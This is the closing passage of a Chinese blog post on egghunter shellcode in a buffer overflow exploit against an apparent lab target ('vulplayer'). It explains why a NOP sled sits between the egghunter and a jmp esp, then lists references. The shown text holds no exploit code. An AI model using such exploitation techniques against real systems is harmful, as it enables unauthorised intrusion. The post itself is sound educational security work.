<p>nops那里我在<code>eggfinder</code>与<code>jmpesp</code>间插入了一段nop，原因是我在调试过程中发现func函数执行过<code>call _chkesp</code>后会在我的栈中修改一些数据，即<br><img src="/2020/05/07/egghunter原理与实战/坑-1.png" alt><br><img src="/2020/05/07/egghunter原理与实战/坑-2.png" alt><br>所以需要避开hunter寻蛋程序。</p>
<p><img src="/2020/05/07/egghunter原理与实战/shell.png" alt></p>
<p>参考文章：<br><a href="https://bbs.pediy.com/thread-116190.htm" target="_blank" rel="noopener">egg hunting</a><br>谷歌翻译《Safely Searching Process Virtual Address Space》<br><a href="http://www.vfocus.net/art/20070201/809.html" target="_blank" rel="noopener">Windows下的系统调用号</a><br><a href="https://bbs.pediy.com/thread-226531.htm" target="_blank" rel="noopener">windowsXp 系统调用课堂学习笔记</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/egghunter/" rel="tag"># egghunter</a>
          
            <a href="/tags/vulplayer/" rel="tag"># vulplayer</a>
          
            <a href="/tags/溢出/" rel="tag"># 溢出</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/05/05/利用SEH链的缓冲区溢出/" rel="next" title="利用SEH链的缓冲区溢出">
                <i class="fa fa-chevron-left"></i> 利用SEH链的缓冲区溢出
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/07/28/SQL-Server存储过程排序算法/" rel="prev" title="SQL Server存储过程排序算法">
                SQL Server存储过程排序算法 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/zql.jpg" alt="尘林">
            
              <p class="site-author-name" itemprop="name">尘林</p>
              <p class="site-description motion-element" itemprop="description">势，只会裹挟随波逐流之人。一心既定，便不问大势所趋。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">31</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">63</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#准备"><span class="nav-number">1.</span> <span class="nav-text">准备</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#关键点"><span class="nav-number">2.</span> <span class="nav-text">关键点</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#测试"><span class="nav-number">3.</span> <span class="nav-text">测试</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#python写出poc"><span class="nav-number">4.</span> <span class="nav-text">python写出poc</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">尘林</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

</body>
</html>
